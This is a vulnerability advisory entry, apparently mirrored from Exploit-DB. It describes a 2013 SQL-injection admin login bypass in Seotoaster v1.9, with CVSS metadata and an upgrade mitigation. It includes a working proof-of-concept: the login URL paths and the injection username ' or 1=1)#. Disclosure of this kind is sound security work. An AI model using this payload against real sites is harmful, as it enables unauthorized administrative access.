Seotoaster SQL-Injection Admin Login Bypass

vendor:

Seotoaster

by:

Stefan Schurtz

7.5

CVSS

HIGH

SQL-Injection

CWE

Product Name: Seotoaster

Affected Version From: Seotoaster v.1.9

Affected Version To: Seotoaster v.1.9

Patch Exists: YES

Related CWE: N/A

CPE: a:seotoaster:seotoaster

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2013

Seotoaster SQL-Injection Admin Login Bypass

Seotoaster v.1.9 is prone to an SQL-Injection which bypass the admin login. The exploit can be triggered by sending a crafted HTTP request to the target URL with the user input as ' or 1=1)# and any password.

Mitigation:

Upgrade to the latest version

Source

Exploit-DB raw data:

#################################################################################
# Advisory:		Seotoaster SQL-Injection Admin Login Bypass
# Author:       		Stefan Schurtz
# Contact:      		sschurtz@t-online.de
# Affected Software:    	Successfully tested on Seotoaster v.1.9
# Vendor URL:       	http://www.seotoaster.com/
# Vendor Status:    	fixed
#################################################################################

==========================
Vulnerability Description
==========================

Seotoaster v.1.9 is prone to an SQL-Injection which bypass the admin login

==================
PoC-Exploit
==================

http://<target>/seotoaster/go
or
http://<target>/go

User: ' or 1=1)#
PW: notimportant

=========
Solution
=========

Upgrade to the latest version

========
Credits
========

Vulnerabilitiy found and advisory written by Stefan Schurtz

===========
References
===========

http://secunia.com/advisories/46881/